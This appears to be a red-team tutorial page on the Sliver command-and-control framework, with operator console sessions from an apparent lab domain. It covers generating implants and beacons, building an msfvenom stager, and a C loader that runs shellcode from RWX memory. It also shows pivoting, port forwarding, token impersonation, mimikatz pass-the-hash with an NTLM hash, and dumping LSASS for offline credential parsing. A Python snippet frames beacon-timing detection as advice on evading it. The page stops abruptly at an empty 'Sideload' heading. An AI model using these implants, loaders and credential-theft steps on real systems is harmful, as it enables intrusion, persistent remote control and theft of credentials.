# Sliver

## References

{% embed url="https://sliver.sh/docs" %}

{% embed url="https://dominicbreuker.com/post/learning_sliver_c2_01_installation/#series-overview" %}

## Setup

### Auto install

```bash
# MinGW cross-compilers are needed to build Windows implants on a Linux server
sudo apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
# Installs sliver-server/sliver-client and the `sliver` systemd unit used below;
# this runs a remote script as root, so read it first if you care about that
curl https://sliver.sh/install|sudo bash
```

### Start the Sliver server

```bash
systemctl start sliver
systemctl status sliver
```

Operator (client) authentication is configured as described in [this post](https://dominicbreuker.com/post/learning_sliver_c2_01_installation/).

### Connect with client

```bash
└─$ sliver
Connecting to localhost:31337 ...

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain dash
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver >
```

## Beacons and Sessions

In Sliver the C2 agent is called an `implant`.

Sliver supports two implant modes: beacons and sessions.

{% hint style="info" %}
Reference: <https://sliver.sh/docs?name=Getting+Started>

Sliver implants in v1.5 and later support two modes of operation: "beacon mode" and "session mode." Beacon mode implements an asynchronous communication style where the implant periodically checks in with the server, retrieves tasks, executes them, and returns the results. In "session mode" the implant will create an interactive real time session using either a persistent connection or using long polling depending on the underlying C2 protocol.
{% endhint %}

Put simply, beacon mode behaves like a Cobalt Strike beacon (asynchronous check-ins), while session mode behaves like a Metasploit session (interactive, real time).

### Generate session implant

```bash
sliver > generate --mtls <C2 server ip> --os windows --arch amd64 --format exe --save /tmp/shell.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 44s
[*] Implant saved to /tmp/shell.exe
```

Start the mTLS listener (default port 8888):

```bash
sliver > mtls

[*] Starting mTLS listener ...

[*] Successfully started job #1

sliver > jobs

 ID   Name   Protocol   Port   Stage Profile 
==== ====== ========== ====== ===============
 1    mtls   tcp        8888                 

sliver >  

```

Interacting with sessions:

```bash
[*] Session bb86e5a5 DIGITAL_ATTENTION - 192.168.179.11:59818 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 22:59:29 EST

sliver > sessions

 ID         Name                Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Message                             Health  
========== =================== =========== ====================== ================== ========================= ================== ======== ======================================== =========
 bb86e5a5   DIGITAL_ATTENTION   mtls        192.168.179.11:59818   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 22:59:29 EST 2024 (23s ago)   [ALIVE] 

sliver > use

? Select a session or beacon: SESSION  bb86e5a5  DIGITAL_ATTENTION  192.168.179.11:59818  DomainController  ENDY-COMP\administrator  windows/amd64
[*] Active session DIGITAL_ATTENTION (bb86e5a5-82e0-4562-80db-02dab7f3e0d9)

sliver (DIGITAL_ATTENTION) > info

        Session ID: bb86e5a5-82e0-4562-80db-02dab7f3e0d9
              Name: DIGITAL_ATTENTION
          Hostname: DomainController
              UUID: 6d114d56-3846-0706-4bad-06bcafa25169
          Username: ENDY-COMP\administrator
               UID: S-1-5-21-3689512688-2841538555-566222747-500
               GID: S-1-5-21-3689512688-2841538555-566222747-513
               PID: 5468
                OS: windows
           Version: Server 2016 build 14393 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://192.168.179.132:8888
    Remote Address: 192.168.179.11:59818
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)
      Last Checkin: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)
```

Background the session to return to the main prompt, then kill it with `sessions -k <id>` (the ID below belongs to a different session from a later run):

```bash
sliver (DIGITAL_ATTENTION) > background

[*] Background ...

sliver > sessions

 ID         Name                Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Message                              Health  
========== =================== =========== ====================== ================== ========================= ================== ======== ========================================= =========
 75da56b4   DIGITAL_ATTENTION   mtls        192.168.179.11:59853   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 23:03:57 EST 2024 (1m4s ago)   [ALIVE] 

sliver > sessions -k 75da56b4

[!] Lost session 75da56b4 DIGITAL_ATTENTION - 192.168.179.11:59853 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:05:21 EST


sliver >
```

### Generate beacon implant

```bash
sliver > generate beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --save /tmp/beacon.exe --seconds 5 --jitter 3

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 29s
[*] Implant saved to /tmp/beacon.exe
```

Interacting with beacons:

```bash
[*] Beacon be2fe170 DETERMINED_JUNKET - 192.168.179.11:59885 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:10:34 EST

sliver > beacons

 ID         Name                Tasks   Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Check-In                           Next Check-In                        
========== =================== ======= =========== ====================== ================== ========================= ================== ======== ======================================= ======================================
 be2fe170   DETERMINED_JUNKET   0/0     mtls        192.168.179.11:59885   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 23:10:47 EST 2024 (3s ago)   Sat Dec 21 23:10:52 EST 2024 (in 2s)

sliver > use

? Select a session or beacon: BEACON  be2fe170  DETERMINED_JUNKET  192.168.179.11:59885  DomainController  ENDY-COMP\administrator  windows/amd64
[*] Active beacon DETERMINED_JUNKET (be2fe170-f919-47fe-8c3d-9ed9fb54ee99)

sliver (DETERMINED_JUNKET) > info

         Beacon ID: be2fe170-f919-47fe-8c3d-9ed9fb54ee99
              Name: DETERMINED_JUNKET
          Hostname: DomainController
              UUID: 6d114d56-3846-0706-4bad-06bcafa25169
          Username: ENDY-COMP\administrator
               UID: S-1-5-21-3689512688-2841538555-566222747-500
               GID: S-1-5-21-3689512688-2841538555-566222747-513
               PID: 5484
                OS: windows
           Version: Server 2016 build 14393 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://192.168.179.132:8888
    Remote Address: 192.168.179.11:59885
         Proxy URL: 
          Interval: 5s
            Jitter: 3s
     First Contact: Sat Dec 21 23:10:34 EST 2024 (24s ago)
      Last Checkin: Sat Dec 21 23:10:53 EST 2024 (5s ago)
      Next Checkin: Sat Dec 21 23:10:58 EST 2024 (0s ago)

sliver (DETERMINED_JUNKET) > 
```

Check tasks

```bash
sliver (DETERMINED_JUNKET) > tasks

 ID         State       Message Type   Created                         Sent                            Completed                     
========== =========== ============== =============================== =============================== ===============================
 2b2aec2f   completed   Screenshot     Sat, 21 Dec 2024 23:12:08 EST   Sat, 21 Dec 2024 23:12:12 EST   Sat, 21 Dec 2024 23:12:12 EST 
 9ecc207b   completed   Execute        Sat, 21 Dec 2024 23:12:04 EST   Sat, 21 Dec 2024 23:12:06 EST   Sat, 21 Dec 2024 23:12:06 EST 

```

Reconfigure the beacon's interval and jitter (applied when the beacon picks up the task at its next check-in):

```bash
sliver (DETERMINED_JUNKET) > reconfig -i 5s -j 1s

[*] Tasked beacon DETERMINED_JUNKET (428cea99)

[+] DETERMINED_JUNKET completed task 428cea99

[*] Reconfigured beacon  
```
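The interval and jitter above decide how a beacon looks on the wire. The following Python is an added example, not Sliver's code: it simulates the check-in schedule of a beacon built with `--seconds 5 --jitter 3` (and the `5s`/`1s` setting after `reconfig`), recovers interval and jitter from the observed gaps, and applies the simple periodicity heuristic a detection engineer would run over proxy or firewall logs. The sleep formula (interval plus a uniform random jitter, consistent with the 5 s gaps in the `info` output) and the constructed timestamps are assumptions of the example.

```python
import random
import statistics

# Added example, not Sliver's code. Assumption: a beacon sleeps
# interval + uniform(0, jitter) between check-ins; the 5 s gaps in the
# `info` output above (interval 5s, jitter 3s) are consistent with that.


def beacon_checkins(interval_s, jitter_s, count, seed=1):
    """Constructed check-in times (seconds after first contact) for a
    beacon built with --seconds interval_s --jitter jitter_s."""
    rng = random.Random(seed)
    t, times = 0.0, [0.0]
    for _ in range(count - 1):
        t += interval_s + (rng.uniform(0, jitter_s) if jitter_s > 0 else 0.0)
        times.append(t)
    return times


def random_traffic(mean_gap_s, count, seed=1):
    """Constructed non-beacon baseline: exponential (Poisson-like) gaps,
    roughly what interactive browsing looks like in the same log."""
    rng = random.Random(seed)
    t, times = 0.0, [0.0]
    for _ in range(count - 1):
        t += rng.expovariate(1.0 / mean_gap_s)
        times.append(t)
    return times


def inter_arrival(times):
    return [b - a for a, b in zip(times, times[1:])]


def estimate_config(times):
    """Invert the schedule from observed gaps: the smallest gap
    approximates the interval, the spread approximates the jitter."""
    gaps = inter_arrival(times)
    interval = min(gaps)
    return interval, max(gaps) - interval


def beaconing_score(times, min_samples=8, cv_threshold=0.3):
    """Coefficient of variation of the gaps. Periodic check-ins keep a
    low CV even with jitter; human-driven traffic does not.
    Returns (cv, suspicious); (None, False) if there are too few samples."""
    gaps = inter_arrival(times)
    if len(gaps) < min_samples:
        return None, False
    cv = statistics.pstdev(gaps) / statistics.fmean(gaps)
    return cv, cv < cv_threshold


if __name__ == "__main__":
    for label, series in (("beacon 5s/3s", beacon_checkins(5, 3, 200)),
                          ("beacon 5s/1s", beacon_checkins(5, 1, 200)),
                          ("browsing", random_traffic(6.5, 200))):
        cv, flag = beaconing_score(series)
        est_i, est_j = estimate_config(series)
        print(f"{label:12s} est interval={est_i:5.2f}s jitter={est_j:5.2f}s "
              f"cv={cv:.3f} suspicious={flag}")
```

The takeaway for the operator is the inverse of the detection: a small jitter relative to the interval leaves the check-in period trivially recoverable, so on a real engagement pick a longer interval and a jitter that is a sizeable fraction of it.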

Promote a beacon to a session (the beacon is tasked to open an interactive connection back to its C2):

```bash
sliver (DETERMINED_JUNKET) > interactive 

[*] Using beacon's active C2 endpoint: mtls://192.168.179.132:8888
[*] Tasked beacon DETERMINED_JUNKET (51e7cb02)

[*] Session caee6edb DETERMINED_JUNKET - 192.168.179.11:59967 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:17:21 EST

sliver (DETERMINED_JUNKET) >
```

The session can also be opened over a different C2 protocol than the beacon uses, by passing a connection string with one of the flags below:

```bash
sliver > interactive --help

Task a beacon to open an interactive session (Beacon only)

Usage:
======
  interactive [flags]

Flags:
======
  -d, --delay      string    delay opening the session (after checkin) for a given period of time (default: 0s)
  -n, --dns        string    dns connection strings
  -h, --help                 display help
  -b, --http       string    http(s) connection strings
  -m, --mtls       string    mtls connection strings
  -p, --named-pipe string    namedpipe connection strings
  -i, --tcp-pivot  string    tcppivot connection strings
  -t, --timeout    int       command timeout in seconds (default: 60)
  -g, --wg         string    wg connection strings
```

{% hint style="info" %}

* A beacon can be turned into a session, but a session cannot be turned back into a beacon.
* Some commands, such as `shell` and `portfwd`, only work with sessions.
{% endhint %}

## Profiles

Profiles store a `generate` configuration so implants can be rebuilt quickly.

Session profile:

```bash
sliver > profiles new --mtls 192.168.179.132 --os windows --arch amd64 --format exe session_win_default

[*] Saved new implant profile session_win_default

sliver > profiles 

 Profile Name          Implant Type   Platform        Command & Control                 Debug   Format       Obfuscation   Limitations 
===================== ============== =============== ================================= ======= ============ ============= =============
 session_win_default   session        windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   

sliver > profiles generate --save /tmp/shell.exe session_win_default

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 24s
[*] Implant saved to /tmp/shell.exe
```

Beacon profile:

```bash
sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default

[*] Saved new implant profile (beacon) beacon_win_default

sliver > profiles 

 Profile Name          Implant Type   Platform        Command & Control                 Debug   Format       Obfuscation   Limitations 
===================== ============== =============== ================================= ======= ============ ============= =============
 beacon_win_default    beacon         windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   
 session_win_default   session        windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   

sliver > profiles generate --save /tmp/beacon.exe beacon_win_default

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/beacon.exe

```

List the implant builds:

```bash
sliver > implants 

 Name                Implant Type   Template   OS/Arch             Format   Command & Control                 Debug 
=================== ============== ========== =============== ============ ================================= =======
 DETERMINED_JUNKET   beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 DIGITAL_ATTENTION   session        sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 EASY_BROOM          session        sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 FRESH_AUDIENCE      beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 TALL_POST           beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.122.111:8888   false 
```

Remove an implant build:

```bash
sliver > implants rm TALL_POST

? Remove 'TALL_POST' build? Yes

```

## Stager

To build a stager, first create a profile with `--format shellcode`:

```bash
sliver > profiles new --http 192.168.179.132 --format shellcode win-shellcode

[*] Saved new implant profile win-shellcode
```

Start the HTTPS listener that the staged implant will call back to:

```bash
sliver > https

[*] Starting HTTPS :443 listener ...

[*] Successfully started job #1

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        443                  

```

Create a stage listener for the profile to deliver the payload. Remember `--prepend-size`: it prefixes the served stage with its length, which the Metasploit `custom` stagers used below need in order to know how much to read.

```bash
sliver > stage-listener --url http://192.168.179.132:1234 --profile win-shellcode --prepend-size

[*] No builds found for profile win-shellcode, generating a new one
[*] Sliver name for profile win-shellcode: UNNECESSARY_DICTAPHONE
[*] Job 8 (http) started

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile                                       
==== ======= ========== ====== =====================================================
 7    https   tcp        443                                                        
 8    http    tcp        1234   win-shellcode (Sliver name: UNNECESSARY_DICTAPHONE) 
```

Generate the stager that pulls that stage with msfvenom. It must be a `custom` payload (`windows/x64/custom/reverse_winhttp`); a meterpreter stager will not work, because it expects a Metasploit stage rather than Sliver shellcode. The `.woff` extension in `LURI` matches the default stager file extension of Sliver's HTTP C2 profile.

```bash
msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.179.132 LPORT=1234 LURI=/hello.woff --format exe --out /tmp/stager.exe
```

Alternatively, generate it in C format (`--format c`) and use the following loader:

```c
#include <windows.h>
#include <string.h>

int main(void)
{
    /* Paste the array produced by `msfvenom ... --format c` here.
       Only the start and end of the listing are shown; the middle is elided. */
    unsigned char shellcode[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
    "\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
    ...
    "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
    "\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff"
    "\xd5";

    /* Allocate an RWX region, copy the stager in and jump to it. The stager
       downloads the size-prefixed stage from the stage listener and runs it. */
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL)
        return 1;
    memcpy(exec, shellcode, sizeof shellcode);
    ((void (*)(void))exec)();

    return 0;
}
```

Compile

```bash
x86_64-w64-mingw32-gcc -o shellrunner.exe shellrunner.c
```

After launching the file, wait 5-10 s for the session to come back (sometimes a session arrives without an alert being printed, so run `sessions` to be sure).
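To make concrete what `--prepend-size` changes and how raw shellcode ends up in the loader above, here is an added Python example (not part of this page or of Sliver). It builds and parses the size-prefixed stage blob, assumed to be a 4-byte little-endian length followed by the stage, which is the form the Metasploit `custom` stagers read, and renders raw shellcode (for example from `generate --format shellcode`) as the C string literal used by `shellrunner.c`. The sample stage bytes are constructed and are not real shellcode.

```python
import struct

# Constructed sample "stage": a few bytes standing in for real shellcode
# so the example runs offline. A real stage is the implant shellcode that
# `stage-listener --prepend-size` serves.
SAMPLE_STAGE = bytes([0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xCC, 0x00, 0x00, 0x00])


def wrap_stage(stage: bytes) -> bytes:
    """Build the blob a stage listener serves when started with
    --prepend-size: a 4-byte little-endian length, then the stage.
    (Assumption: Sliver's prefix is a little-endian uint32, which is the
    form the msfvenom `custom` stagers read before the body.)"""
    return struct.pack("<I", len(stage)) + stage


def unwrap_stage(blob: bytes) -> bytes:
    """Parse a size-prefixed stage and check that the length field agrees
    with the body. A mismatch usually means the listener was started
    without --prepend-size, or the download was truncated."""
    if len(blob) < 4:
        raise ValueError("blob shorter than the 4-byte length prefix")
    (declared,) = struct.unpack("<I", blob[:4])
    body = blob[4:]
    if declared != len(body):
        raise ValueError(f"prefix says {declared} bytes, body has {len(body)}")
    return body


def to_c_array(shellcode: bytes, name: str = "shellcode", per_line: int = 15) -> str:
    """Render raw bytes in the string-literal layout of `msfvenom --format c`,
    ready to paste into the shellrunner loader."""
    rows = []
    for i in range(0, len(shellcode), per_line):
        chunk = shellcode[i:i + per_line]
        rows.append('    "' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return f"unsigned char {name}[] =\n" + "\n".join(rows) + ";"


if __name__ == "__main__":
    blob = wrap_stage(SAMPLE_STAGE)
    print("prefix:", blob[:4].hex(), "-> stage:", unwrap_stage(blob).hex())
    print(to_c_array(SAMPLE_STAGE))
```

When debugging a stager that never calls back, fetching the stage URL yourself and running it through `unwrap_stage` is a quick way to tell a missing `--prepend-size` apart from a networking problem.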

## Execute Assembly

Sliver can run .NET assemblies in memory with `execute-assembly`, similar to Cobalt Strike. Arguments follow the assembly path; in the run below Seatbelt was given none, which is why it prints `Error running command ""` (pass a check group such as `-group=system` to get useful output).

```bash
sliver (BROKEN_LIQUID) > execute-assembly /home/kali/tools/Ghostpack-CompiledBinaries/Seatbelt.exe

[*] Output:


                        %&&@@@&&                                                                                  
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################                        
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
                        &%%&&&%%%%%        v1.2.1         ,(((&%%%%%%%%%%%%%%%%%,                                 
                         #%%%%##,                                                                                 


ERROR: Error running command ""


[*] Completed collection in 0.006 seconds

```

## Socks and Portfwd

### Socks5

```bash
sliver (BROKEN_LIQUID) > socks5 --help

In-band SOCKS5 Proxy

Usage:
======
  socks5 [flags]

Flags:
======
  -h, --help           display help
  -t, --timeout int    router timeout in seconds (default: 60)

Sub Commands:
=============
  start  Start an in-band SOCKS5 proxy
  stop   Stop a SOCKS5 proxy
  
sliver (BROKEN_LIQUID) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081  
⚠  In-band SOCKS proxies can be a little unstable depending on protocol

sliver (BROKEN_LIQUID) > socks5 

 ID   Session ID                             Bind Address     Username   Passwords 
==== ====================================== ================ ========== ===========
  1   762b70da-f0db-4d20-ada9-a155f4a1ce7d   127.0.0.1:1081                        

sliver (BROKEN_LIQUID) > socks5 stop -i 1

[*] Removed socks5

sliver (BROKEN_LIQUID) >  
```

In my experience its stability is not as good as Cobalt Strike's.

### Portfwd

```bash
sliver (SPICY_JAW) > portfwd --help 

In-band TCP port forwarding

Usage:
======
  portfwd [flags]

Flags:
======
  -h, --help           display help
  -t, --timeout int    command timeout in seconds (default: 60)

Sub Commands:
=============
  add  Create a new port forwarding tunnel
  rm   Remove a port forwarding tunnel

sliver (SPICY_JAW) > portfwd add -b 127.0.0.1:9999 -r 192.168.17.138:445

[*] Port forwarding 127.0.0.1:9999 -> 192.168.17.138:445

```

This binds local port 9999 to port 445 on 192.168.17.138: connections to 127.0.0.1:9999 on the operator machine are tunnelled through the implant.

Remove the port forward:

```bash
sliver (SPICY_JAW) > portfwd

 ID   Session ID                             Bind Address     Remote Address     
==== ====================================== ================ ====================
  1   b0653816-faa9-4975-b28b-92165d4a6085   127.0.0.1:9999   192.168.17.138:445 

sliver (SPICY_JAW) > portfwd rm -i 1

[*] Removed portfwd

```

## Pivot

{% hint style="info" %}
Pivot listeners can only be started on sessions, not on beacons.
{% endhint %}

### TCP Pivot

Start a TCP pivot listener on the session:

```bash
sliver (BROKEN_LIQUID) > pivots tcp 

[*] Started tcp pivot listener :9898 with id 1

sliver (BROKEN_LIQUID) > pivots

 ID   Protocol   Bind Address   Number Of Pivots 
==== ========== ============== ==================
  1   TCP        :9898                         0 

sliver (BROKEN_LIQUID) >
```

Generate an implant that connects back to the C2 through the pivot:

```bash
sliver > generate --tcp-pivot 192.168.17.137:9898 --os windows --arch amd64 --format exe --save /tmp/pivot.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 30s
[*] Implant saved to /tmp/pivot.exe

```

The IP here is the address of the session host (the pivot), which must be reachable from the target.

Upload the binary to the target and run it; the new session comes back over the TCP tunnel through the pivot.

<figure><img src="https://84143647-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOzRSs0yxBc5GafSMIql8%2Fuploads%2FYwuG8gBxFPzi6uUC6WU5%2Fimage.png?alt=media&#x26;token=a2f1981d-354c-4a11-aed6-9a1d9d746318" alt=""><figcaption></figcaption></figure>

### SMB Pivot

Start a named-pipe pivot listener on the session:

```bash
sliver > use 982155fd

[*] Active session BROKEN_LIQUID (982155fd-407a-434b-8686-e4af57c1f295)

sliver (BROKEN_LIQUID) > pivots named-pipe --bind foobar

[*] Started named pipe pivot listener \\.\pipe\foobar with id 2

```

Generate an implant that connects back to the C2 through the named pipe:

```bash
sliver > generate --named-pipe 192.168.17.137/pipe/foobar --os windows --arch amd64 --format exe --save /tmp/pivot.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 34s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/pivot.exe

```

As above, the IP is that of the session host reachable from the target; the pipe is reached over SMB, so TCP 445 on the pivot host must be open to the target.

Result:

<figure><img src="https://84143647-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOzRSs0yxBc5GafSMIql8%2Fuploads%2FLDLgJXdYyFaCAKWcEDCn%2Fimage.png?alt=media&#x26;token=4fc84964-55dd-4a20-bc86-f04f808801e0" alt=""><figcaption></figcaption></figure>

Stop pivot

```bash
sliver (BROKEN_LIQUID) > pivots stop -i 1

[*] Stopped pivot listener
```

## Operating a session

### Rename sessions

```bash
sliver > sessions

 ID         Name               Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health
========== ================== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   BEAUTIFUL_REPORT   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 22:50:55 EST 2025 (2s ago)   [ALIVE]

sliver > use 0456ae36

[*] Active session BEAUTIFUL_REPORT (0456ae36-c402-45b7-b111-8f83916b3048)

sliver (BEAUTIFUL_REPORT) > rename -n WinA

[*] Renamed implant to WinA

sliver > sessions

 ID         Name   Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health
========== ====== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   WinA   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 23:06:52 EST 2025 (1s ago)   [ALIVE]

sliver >

```

### Upload / Download

```bash
sliver (WinA) > download desktop.ini /home/kali/test

[*] Wrote 282 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/test

sliver (WinA) > upload /home/kali/test test

[*] Wrote file to C:\Users\Administrator\Desktop\test

```

### Shell

```bash
sliver (BEAUTIFUL_REPORT) > shell 

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 2844

PS C:\Users\Administrator\Desktop> Shell exited

sliver (BEAUTIFUL_REPORT) >  

```

Press `Ctrl+D` (EOF) to exit the shell.

### Execute with output

```bash
sliver (WinA) > execute -o whoami /all

[*] Output:

USER INFORMATION
----------------

User Name          SID                                        
================== ===========================================
wina\administrator S-1-5-21-2122276757-511757396-437061769-500


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group             
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                                                

```

### Make token

```bash
sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\ (0 items, 0 B)
================================


sliver (WinA) > make-token -u userB -p Password123 -d .

[*] Successfully impersonated .\userB. Use `rev2self` to revert to your previous token.
sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\Share\ (1 item, 0 B)
=====================================
-rw-rw-rw-  123.txt  0 B  Sat Jan 04 21:48:13 -0800 2025


sliver (WinA) >
```

Use `rev2self` to drop the token and return to the original context. By default `make-token` creates a network-only logon (like `runas /netonly`): the new credentials are used for outbound authentication such as the SMB listing above, while local checks like `whoami` still show the original user.

### Pass the hash

```bash
sliver (LOVELY_STAR) > upload /home/kali/tools/mimikatz/x64/mimikatz.exe mimikatz.exe

[*] Wrote file to C:\Users\Administrator\Desktop\mimikatz.exe

sliver (LOVELY_STAR) > execute -o mimikatz.exe "privilege::debug" "sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:\"powershell -w hidden\"" "exit"

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:"powershell -w hidden"
user    : userB
domain  : .
program : powershell -w hidden
impers. : no
NTLM    : 58a478135a93ac3bf058a5ea0e8fdb71
  |  PID  3048
  |  TID  1900
  |  LSA Process is now R/W
  |  LUID 0 ; 2745069 (00000000:0029e2ed)
  \_ msv1_0   - data copy @ 000001E1308E1CF0 : OK !
  \_ kerberos - data copy @ 000001E12FD0DB98
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001E12FD3A208 (32) -> null

mimikatz(commandline) # exit
Bye!
```

### Dump process

```bash
sliver (WinA) > procdump --pid 672 --save lsass.dmp

[*] Process dump stored in: lsass.dmp
```

Parse the LSASS minidump offline with pypykatz:

```bash
┌──(kali㉿kali)-[~]
└─$ pypykatz lsa minidump lsass.dmp
INFO:pypykatz:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
== LogonSession ==
authentication_id 113459 (1bb33)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server 
logon_time 2025-01-05T07:49:38.007112+00:00
sid S-1-5-7
luid 113459
....
```

### Sideload

```bash
